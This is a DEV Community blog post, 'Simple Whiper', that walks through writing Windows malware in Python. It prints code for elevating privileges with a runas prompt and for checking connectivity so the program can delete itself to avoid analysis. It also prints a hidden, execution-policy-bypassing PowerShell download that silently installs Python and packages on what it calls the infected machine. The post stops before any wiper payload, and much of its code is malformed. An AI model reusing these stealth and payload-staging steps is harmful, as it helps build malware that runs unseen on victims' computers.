DEV Community

maximilian feldthusen
maximilian feldthusen

Posted on

Simple Whiper

Introduction

In this article, I’ll describe how to write a malware, Please notice this is not a “true” malware this is only has to show
you the basics and even how easy to be written, Probably python is not the best choice at all, It’s an interpreted language and so it needs an interpreter to be executed so to write a malware probably other languages that can work to a lower level and that can be compiled are probably a better choice, malware is often designed to be small, stealthy, have low memory footprint, and use limited processing power.
So it’s very common to see malware written in C & Assembly.

Overview

At first, I will show its code then I will describe generally how this malware works, code consisted of two components: we are talking only about windows, The techniques you gone see in this malware are taken from a public malware samples.
The First function IsAdmin

def IsAdmin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
            except:
                    return False

Enter fullscreen mode Exit fullscreen mode

it checks if it has Administrator privileges, if it doesn’t it runs RunAsAdmin using the ShellExecute trick runas to elevate
privileges, and exits immediately


def RunAsAdmin():
ctypes.windll.shell32.IsUserAnAdmin() or (ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1) > 32, sys.exit())

Is64Bit

def Is64Bit():
    return platform.machine().endswith('64')

Enter fullscreen mode Exit fullscreen mode

it just check if the current process is a 64-bit using platform lib this function it’s gone be called later in InstallPy to determine which version of python should be installed, a simple if statement.

os_p = 64
        if not Is64Bit():
            os_p = 32
Enter fullscreen mode Exit fullscreen mode

IsOnline This function simply checks if the infected computer is online using the “request” lib to get an HTTP response If TRUE, pass if not, the program will delete it itself why? Desperate ways to avoid analysis and we don’t want to infect a dead computer 😉

def IsOnline():
    try:
        x = requests.get('https://google.com', verify=False)
            return True
                except:
                    return False

Interpreter
Enter fullscreen mode Exit fullscreen mode

IsPyExist Here I am using os.path.exists to see if python path exist in infected computer this can be done also by using subprocess to execute powershell cmd to check the version of python this way we can tell if python is present on the infected computer or not.

    p = subprocess.run(['powershell',
                        """$p = &{python -V} 2>&1;$version = if($p -is [System.Management.Automation.ErrorRecord]){$p.Exception.Message}; $p"""],
                       stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True, startupinfo=startupinfo)
    p.stdout.decode()
    return True
    for num in range(10, 45):
        if os.path.exists(f"C:/Users/{os.getlogin()}/Appdata/Local/Programs/Python/Python{num}/python.exe"):
            return True
            return False

Enter fullscreen mode Exit fullscreen mode

InstallPy The goal of this function is to install Python on the infected machine. The key is that we are installing our interpreter using a language that is already built into Windows.


def InstallPy():
    os_p = 64
    if not Is64Bit():
        os_p = 32
    rand_py = f'python{random.randrange(111, 9999999)}.exe'
    url = "https://www.python.org/ftp/python/3.8.1/python-3.8.1-amd64.exe" if os_p == 64 else "https://www.python.org/ftp/python/3.8.1/python-3.8.1.exe"
    subprocess.run(
        f"""powershell -ep Bypass -WindowStyle Hidden -Command "iwr -Uri {url} -OutFile c:/users/$env:username/appdata/local/temp/{rand_py}" """)
    if os.path.exists(f"c:/users/{os.getlogin()}/appdata/local/temp/{rand_py}"):
        subprocess.run(
            f"c:/users/{os.getlogin()}/appdata/local/temp/{rand_py} /quiet InstallAllUsers=0 Include_launcher=0 PrependPath=1 Include_test=0")
    os.remove(f"c:/users/{os.getlogin()}/appdata/local/temp/{rand_py}")
    subprocess.run("python -m pip install --upgrade pip")
    subprocess.run("python -m pip install pyinstaller psutil")
    pip_list = RunPwsh("pip list")
    if 'psutil' in pip_list.lower():
        wait4 = os.system('msg %username% in!')
    subprocess.run("msg %username% finished")
    return True
Enter fullscreen mode Exit fullscreen mode
PowerShell -WindowStyle Hidden
Enter fullscreen mode Exit fullscreen mode

will hide the window.

-ExecutionPolicy Bypass
Enter fullscreen mode Exit fullscreen mode

should already do the run as admin part

iwr -Uri Invoke-WebRequest
Enter fullscreen mode Exit fullscreen mode

It parses the response and returns collections of links,
The {url} will automatically download no need for user interaction -OutFile output python exe to temp directory under a random name using {rand_py}

Top comments (0)